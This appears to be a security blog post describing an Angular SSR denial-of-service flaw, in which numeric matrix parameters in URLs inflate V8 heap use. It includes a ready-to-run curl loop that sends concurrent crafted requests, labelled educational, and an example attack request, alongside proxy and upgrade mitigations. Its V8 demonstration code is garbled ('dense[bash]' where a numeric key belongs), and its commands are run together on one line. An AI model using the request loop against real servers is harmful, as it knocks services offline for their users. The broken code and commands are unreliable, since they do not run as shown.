Listen to this Post
CVE-2026-101896: Angular SSR Denial of Service via Matrix Parameter Heap Amplification
A denial of service (DoS) vulnerability was identified in `@angular/router` when Server-Side Rendering (SSR) is enabled on Node.js (V8). When `@angular/router` parses incoming request URLs, it extracts path segments, matrix parameters, and child outlets into plain JavaScript objects (Record<string, string>). When matrix parameter names or outlet names are numeric strings (such as /a;990;2522), the V8 JavaScript engine interprets them as array-indexed properties rather than named properties.
Under V8’s internal property-storage heuristics, setting numeric keys on an initially empty object causes V8 to allocate a dense array backing store (HOLEY_ELEMENTS) sized to the maximum index rather than falling back to sparse dictionary storage. Specifically, assigning sequential or moderately large numeric keys (like `990` followed by 2522) causes V8 to allocate a contiguous backing store of ~2,522 pointers (~20 KB to 25 KB of heap) for a single 11-byte segment. Because each segment in a URL path allocates its own independent `parameters` object, an attacker can craft URLs with repeated numeric matrix parameters to achieve an asymmetric memory amplification factor of approximately ~350x.
Successful exploitation allows an unauthenticated remote attacker to exhaust the Node.js old-space heap with modest request volume, terminating the SSR worker with an unrecoverable `JavaScript heap out of memory` fatal error and causing a Denial of Service. A single 11-byte segment (/a;990;2522) consumes ~20 KB–25 KB of V8 heap. With 8 KB request paths (~740 segments, within default Nginx 8 KB buffer limits), as few as 12–22 concurrent requests crash a 256 MiB–512 MiB Node.js SSR worker. With smaller 1 KB–2 KB request paths (~90–180 segments), a burst of ~50–100 concurrent requests achieves the same heap exhaustion. Pure client-side Angular applications (SPAs without SSR) are not vulnerable, as local browser memory consumption does not cross a security boundary. An application is affected only if SSR is enabled on Node.js/V8, user-controlled request URLs are parsed by `@angular/router` during SSR, and upstream reverse proxies forward URLs containing semicolons and multiple path segments without stripping or rejecting them.
DailyCVE Form:
Platform: Angular SSR
Version: 20.3.32
Vulnerability: Heap Exhaustion
Severity: Medium
date: 2026-09-23
Prediction: Patch released 2026-09-23
What Undercode Say
Analytics
Check Angular version in use npm list @angular/router Verify SSR is enabled grep -r "server" angular.json Monitor Node.js heap usage under load node --inspect --max-old-space-size=512 server.js & Then visit chrome://inspect for profiling Simulate attack load (educational) for i in $(seq 1 50); do curl -s "http://target/a;990;2522/a;990;2522/a;990;2522/" & done wait
V8 Heap Behavior (Educational)
// Demonstrating dense vs sparse object storage in V8
const dense = {};
dense[bash] = "x"; // Allocates HOLEY_ELEMENTS backing store (~20KB)
const sparse = {};
sparse["key2522"] = "x"; // Uses dictionary storage (sparse)
console.log(%HasFastHoleyElements(dense)); // true
console.log(%HasFastHoleyElements(sparse)); // false
Exploit: (Educational Purposes!)
An attacker sends concurrent HTTP requests with repeated numeric matrix parameters:
GET /a;990;2522/a;990;2522/a;990;2522/... HTTP/1.1 Host: example.com
Even with paths under 2 KB, overlapping requests during SSR rapidly consume the V8 heap until the process crashes with JavaScript heap out of memory. The amplification factor (~350x) means each 11-byte segment consumes ~20 KB–25 KB of V8 heap, making this an asymmetric memory exhaustion attack requiring minimal request volume.
Protection:
The issue is resolved by updating `@angular/router` to enforce V8 dictionary elements storage (setUrlDerivedKey) for numeric URL-derived keys (index >= 32). This prevents V8 from allocating oversized contiguous array backing stores while preserving route matching, parameter values, and component input bindings.
If you cannot immediately upgrade to a patched version, apply one of the following mitigations at your edge or reverse proxy:
Block or Sanitize Matrix Parameters at the Reverse Proxy:
Nginx example: reject requests containing matrix parameters
if ($uri ~ ";") {
return 400;
}
Enforce Strict Path Segment Limits:
Reject requests with excessive path depth (e.g., more than 20–30 segments).
Increase Node.js Old Space:
Increase `–max-old-space-size` (e.g., to 2048 or 4096 MB) to increase the concurrency threshold required to exhaust memory, though this does not fully eliminate the vulnerability under sustained traffic.
Impact:
Successful exploitation allows an unauthenticated remote attacker to exhaust the Node.js old-space heap with modest request volume, terminating the SSR worker with an unrecoverable `JavaScript heap out of memory` fatal error and causing a Denial of Service. High amplification (~350x) and low concurrency requirements make this a practical DoS vector against exposed Angular SSR deployments. Client-side SPAs remain unaffected.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

